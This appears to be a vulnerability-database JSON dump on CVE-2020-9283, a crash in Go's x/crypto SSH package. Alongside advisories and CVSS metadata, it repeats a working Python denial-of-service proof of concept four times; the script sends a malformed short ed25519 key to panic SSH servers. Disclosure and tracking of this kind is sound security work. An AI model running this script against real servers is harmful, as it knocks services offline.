3.6}, "published": "2020-02-24T00:00:00", "title": "Go SSH servers 0.0.2 - Denial of Service (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-24T00:00:00", "id": "EXPLOITPACK:BBAC75CC4F436EA7C87BF4A93573E140", "href": "", "sourceData": "# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)\n# Author: Mark Adams\n# Date: 2020-02-21\n# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py\n# CVE: CVE-2020-9283\n#\n# Running this script may crash the remote SSH server if it is vulnerable.\n# The GitHub repository contains a vulnerable and fixed SSH server for testing.\n#\n# $ python poc.py\n# ./poc.py <host> <port> <user>\n#\n# $ python poc.py localhost 2022 root\n# Malformed auth request sent. This should cause a panic on the remote server.\n#\n\n#!/usr/bin/env python\n\nimport socket\nimport sys\n\nimport paramiko\nfrom paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST\n\nif len(sys.argv) != 4:\n print('./poc.py <host> <port> <user>')\n sys.exit(1)\n\nhost = sys.argv[1]\nport = int(sys.argv[2])\nuser = sys.argv[3]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((host, port))\n\nt = paramiko.Transport(sock)\nt.start_client()\n\nt.lock.acquire()\nm = paramiko.Message()\nm.add_byte(cMSG_SERVICE_REQUEST)\nm.add_string(\"ssh-userauth\")\nt._send_message(m)\n\nm = paramiko.Message()\nm.add_byte(cMSG_USERAUTH_REQUEST)\nm.add_string(user)\nm.add_string(\"ssh-connection\")\nm.add_string('publickey')\nm.add_boolean(True)\nm.add_string('ssh-ed25519')\n\n# Send an SSH key that is too short (ed25519 keys are 32 bytes)\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x15key-that-is-too-short')\n\n# Send an empty signature (the server won't get far enough to validate it)\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x00')\n\nt._send_message(m)\n\nprint('Malformed auth request sent. This should cause a panic on the remote server.')", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2022-07-02T11:20:35", "description": "A denial of service vulnerability was found in the SSH package of the golang.org/x/crypto library. An attacker could exploit this flaw by supplying crafted SSH ed25519 keys to cause a crash in applications that use this package as either an SSH client or server.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-08-15T06:09:30", "type": "redhatcve", "title": "CVE-2020-9283", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-07-02T11:18:29", "id": "RH:CVE-2020-9283", "href": "https://access.redhat.com/security/cve/cve-2020-9283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "githubexploit": [{"lastseen": "2022-04-14T14:44:10", "description": "# Exploit for CVE-2020-9283 \n\nThis project is inspired by the o...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-02T10:55:37", "type": "githubexploit", "title": "Exploit for Improper Verification of Cryptographic Signature in Golang Package Ssh", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-04-14T11:27:42", "id": "4885CEF9-D05F-5F90-87FD-2C29C6ADAC5D", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "privateArea": 1}], "hackerone": [{"lastseen": "2021-09-24T12:53:16", "bounty": 0.0, "description": "I found that you are using golang.org/x/crypto@v0.0.0-20201016220609-9e8e0b390897 which has a vulnerability that was fixed in this version \ngolang.org/x/crypto@0.0.0-20201203163018-be400aefbc4c but that vulnerability is:\ngolang.org/x/crypto/ssh is an SSH client and server\nVersion v0.0.0-20200220183623-bac4c82f6975 of golang.org/x/crypto fixes a vulnerability in the golang.org/x/crypto/ssh package which allowed peers to cause a panic in SSH servers that accept public keys and in any SSH client.\nYou can check all of the info here with this CVE: CVE-2020-9283.\n\n## Impact\n\nAn attacker can craft an ssh-ed25519 or sk-ssh-...@openssh.com public key, such that the library will panic when trying to verify a signature with it. Clients can deliver such a public key and signature to any golang.org/x/crypto/ssh server with a PublicKeyCallback, and servers can deliver them to any golang.org/x/crypto/ssh client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-06T17:07:57", "type": "hackerone", "title": "Sifchain: SSH server due to Improper Signature Verification", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2021-08-30T14:35:11", "id": "H1:1294043", "href": "https://hackerone.com/reports/1294043", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "github": [{"lastseen": "2022-04-27T17:34:34", "description": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-05-18T15:29:31", "type": "github", "title": "Improper Verification of Cryptographic Signature in golang.org/x/crypto", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-01-04T19:50:38", "id": "GHSA-FFHG-7MH4-33C4", "href": "https://github.com/advisories/GHSA-ffhg-7mh4-33c4", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "zdt": [{"lastseen": "2021-12-04T15:56:40", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2020-02-24T00:00:00", "type": "zdt", "title": "Go SSH servers 0.0.2 - Denial of Service Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-24T00:00:00", "id": "1337DAY-ID-34008", "href": "https://0day.today/exploit/description/34008", "sourceData": "# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)\n# Author: Mark Adams\n# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py\n# CVE: CVE-2020-9283\n#\n# Running this script may crash the remote SSH server if it is vulnerable.\n# The GitHub repository contains a vulnerable and fixed SSH server for testing.\n#\n# $ python poc.py\n# ./poc.py <host> <port> <user>\n#\n# $ python poc.py localhost 2022 root\n# Malformed auth request sent. This should cause a panic on the remote server.\n#\n\n#!/usr/bin/env python\n\nimport socket\nimport sys\n\nimport paramiko\nfrom paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST\n\nif len(sys.argv) != 4:\n print('./poc.py <host> <port> <user>')\n sys.exit(1)\n\nhost = sys.argv[1]\nport = int(sys.argv[2])\nuser = sys.argv[3]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nsock.connect((host, port))\n\nt = paramiko.Transport(sock)\nt.start_client()\n\nt.lock.acquire()\nm = paramiko.Message()\nm.add_byte(cMSG_SERVICE_REQUEST)\nm.add_string(\"ssh-userauth\")\nt._send_message(m)\n\nm = paramiko.Message()\nm.add_byte(cMSG_USERAUTH_REQUEST)\nm.add_string(user)\nm.add_string(\"ssh-connection\")\nm.add_string('publickey')\nm.add_boolean(True)\nm.add_string('ssh-ed25519')\n\n# Send an SSH key that is too short (ed25519 keys are 32 bytes)\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x15key-that-is-too-short')\n\n# Send an empty signature (the server won't get far enough to validate it)\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x00')\n\nt._send_message(m)\n\nprint('Malformed auth request sent. This should cause a panic on the remote server.')\n", "sourceHref": "https://0day.today/exploit/34008", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debiancve": [{"lastseen": "2022-07-04T05:59:20", "description": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-20T20:15:00", "type": "debiancve", "title": "CVE-2020-9283", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-20T20:15:00", "id": "DEBIANCVE:CVE-2020-9283", "href": "https://security-tracker.debian.org/tracker/CVE-2020-9283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "packetstorm": [{"lastseen": "2020-02-25T23:48:12", "description": "", "cvss3": {}, "published": "2020-02-23T00:00:00", "type": "packetstorm", "title": "Go SSH 0.0.2 Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-9283"], "modified": "2020-02-23T00:00:00", "id": "PACKETSTORM:156480", "href": "https://packetstormsecurity.com/files/156480/Go-SSH-0.0.2-Denial-Of-Service.html", "sourceData": "`# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC) \n# Author: Mark Adams \n# Date: 2020-02-21 \n# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py \n# CVE: CVE-2020-9283 \n# \n# Running this script may crash the remote SSH server if it is vulnerable. \n# The GitHub repository contains a vulnerable and fixed SSH server for testing. \n# \n# $ python poc.py \n# ./poc.py <host> <port> <user> \n# \n# $ python poc.py localhost 2022 root \n# Malformed auth request sent. This should cause a panic on the remote server. \n# \n \n#!/usr/bin/env python \n \nimport socket \nimport sys \n \nimport paramiko \nfrom paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST \n \nif len(sys.argv) != 4: \nprint('./poc.py <host> <port> <user>') \nsys.exit(1) \n \nhost = sys.argv[1] \nport = int(sys.argv[2]) \nuser = sys.argv[3] \n \nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \nsock.connect((host, port)) \n \nt = paramiko.Transport(sock) \nt.start_client() \n \nt.lock.acquire() \nm = paramiko.Message() \nm.add_byte(cMSG_SERVICE_REQUEST) \nm.add_string(\"ssh-userauth\") \nt._send_message(m) \n \nm = paramiko.Message() \nm.add_byte(cMSG_USERAUTH_REQUEST) \nm.add_string(user) \nm.add_string(\"ssh-connection\") \nm.add_string('publickey') \nm.add_boolean(True) \nm.add_string('ssh-ed25519') \n \n# Send an SSH key that is too short (ed25519 keys are 32 bytes) \nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x15key-that-is-too-short') \n \n# Send an empty signature (the server won't get far enough to validate it) \nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x00') \n \nt._send_message(m) \n \nprint('Malformed auth request sent. This should cause a panic on the remote server.') \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156480/gossh002-dos.txt", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-03-23T19:06:15", "description": "golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-20T20:15:00", "type": "cve", "title": "CVE-2020-9283", "cwe": ["CWE-347"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-9283"], "modified": "2022-01-01T19:40:00", "cpe": ["cpe:/a:golang:package_ssh:0.0.0-20200220183623-bac4c82f6975", "cpe:/o:debian:debian_linux:9.0"], "id": "CVE-2020-9283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-9283", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:golang:package_ssh:0.0.0-20200220183623-bac4c82f6975:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*"]}], "exploitdb": [{"lastseen": "2022-05-13T17:50:23", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-02-24T00:00:00", "type": "exploitdb", "title": "Go SSH servers 0.0.2 - Denial of Service (PoC)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-9283", "CVE-2020-9283"], "modified": "2020-02-24T00:00:00", "id": "EDB-ID:48121", "href": "https://www.exploit-db.com/exploits/48121", "sourceData": "# Exploit Title: Go SSH servers 0.0.2 - Denial of Service (PoC)\r\n# Author: Mark Adams\r\n# Date: 2020-02-21\r\n# Link: https://github.com/mark-adams/exploits/blob/master/CVE-2020-9283/poc.py\r\n# CVE: CVE-2020-9283\r\n#\r\n# Running this script may crash the remote SSH server if it is vulnerable.\r\n# The GitHub repository contains a vulnerable and fixed SSH server for testing.\r\n#\r\n# $ python poc.py\r\n# ./poc.py <host> <port> <user>\r\n#\r\n# $ python poc.py localhost 2022 root\r\n# Malformed auth request sent. This should cause a panic on the remote server.\r\n#\r\n\r\n#!/usr/bin/env python\r\n\r\nimport socket\r\nimport sys\r\n\r\nimport paramiko\r\nfrom paramiko.common import cMSG_SERVICE_REQUEST, cMSG_USERAUTH_REQUEST\r\n\r\nif len(sys.argv) != 4:\r\n print('./poc.py <host> <port> <user>')\r\n sys.exit(1)\r\n\r\nhost = sys.argv[1]\r\nport = int(sys.argv[2])\r\nuser = sys.argv[3]\r\n\r\nsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\nsock.connect((host, port))\r\n\r\nt = paramiko.Transport(sock)\r\nt.start_client()\r\n\r\nt.lock.acquire()\r\nm = paramiko.Message()\r\nm.add_byte(cMSG_SERVICE_REQUEST)\r\nm.add_string(\"ssh-userauth\")\r\nt._send_message(m)\r\n\r\nm = paramiko.Message()\r\nm.add_byte(cMSG_USERAUTH_REQUEST)\r\nm.add_string(user)\r\nm.add_string(\"ssh-connection\")\r\nm.add_string('publickey')\r\nm.add_boolean(True)\r\nm.add_string('ssh-ed25519')\r\n\r\n# Send an SSH key that is too short (ed25519 keys are 32 bytes)\r\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x15key-that-is-too-short')\r\n\r\n# Send an empty signature (the server won't get far enough to validate it)\r\nm.add_string(b'\\x00\\x00\\x00\\x0bssh-ed25519\\x00\\x00\\x00\\x00')\r\n\r\nt._send_message(m)\r\n\r\nprint('Malformed auth request sent. This should cause a panic on the remote server.')", "sourceHref": "https://www.exploit-db.com/download/48121", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2022-06-28T22:01:12", "description": "## Summary\n\nSecurity Bulletin: Security vulnerabilities in Go affect IBM Cloud Pak for Multicloud Management Hybrid GRC.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2020-7919](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7919>) \n** DESCRIPTION: **Go is vulnerable to a denial of service. By sending a malformed X.509 certificate, a remote attacker could exploit this vulnerability to cause a system panic. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/178227](<https://exchange.xforce.ibmcloud.com/vulnerabilities/178227>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-15586](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15586>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a data race in some net/http servers. By sending specially-crafted HTTP requests, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/185446](<https://exchange.xforce.ibmcloud.com/vulnerabilities/185446>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-14039](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14039>) \n** DESCRIPTION: **Go could allow a remote attacker to bypass security restrictions, caused by improper validation on the VerifyOptions.KeyUsages EKU requirements during the X.509 certificate verification. An attacker could exploit this vulnerability to gain access to the system. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/185443](<https://exchange.xforce.ibmcloud.com/vulnerabilities/185443>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2020-16845](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16845>) \n** DESCRIPTION: **Go Language is vulnerable to a denial of service, caused by an infinite read loop in ReadUvarint and ReadVarint in encoding/binary. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/186375](<https://exchange.xforce.ibmcloud.com/vulnerabilities/186375>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-24553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-24553>) \n** DESCRIPTION: **Golang Go is vulnerable to cross-site scripting, caused by improper validation of user-supplied input by the CGI/FCGI handlers. A remote attacker could exploit this vulnerability to inject malicious script into a Web page which would be executed in a victim's Web browser within the security context of the hosting Web site, once the page is viewed. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base score: 7.2 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/187776](<https://exchange.xforce.ibmcloud.com/vulnerabilities/187776>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) \n \n** CVEID: **[CVE-2019-17596](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17596>) \n** DESCRIPTION: **Golang Go is vulnerable to a denial of service, caused by a flaw when verifying invalid DSA public key. By sending a specially-crafted request containing an invalid DSA public key, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/170191](<https://exchange.xforce.ibmcloud.com/vulnerabilities/170191>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2020-9283](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9283>) \n** DESCRIPTION: **Golang golang.org/x/crypto is vulnerable to a denial of service, caused by an error during signature verification in the golang.org/x/crypto/ssh package. By persuading a victim to run a specially crafted file, a remote attacker could exploit this vulnerability to cause a panic. \nCVSS Base score: 5.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/176688](<https://exchange.xforce.ibmcloud.com/vulnerabilities/176688>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Cloud Pak for Multicloud Management Security Services| 2.0 \nIBM Cloud Pak for Multicloud Management Security Services| 2.1 \n \n\n\n## Remediation/Fixes\n\nUpgrade to IBM Cloud Pak for Multicloud Management 2.2 by following the instructions in \n\n<https://www.ibm.com/support/knowledgecenter/en/SSFC4F_2.2.0/install/upgrade.html>\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Complete CVSS v3 Guide\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"On-line Calculator v3\" )\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n25 Jan 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference 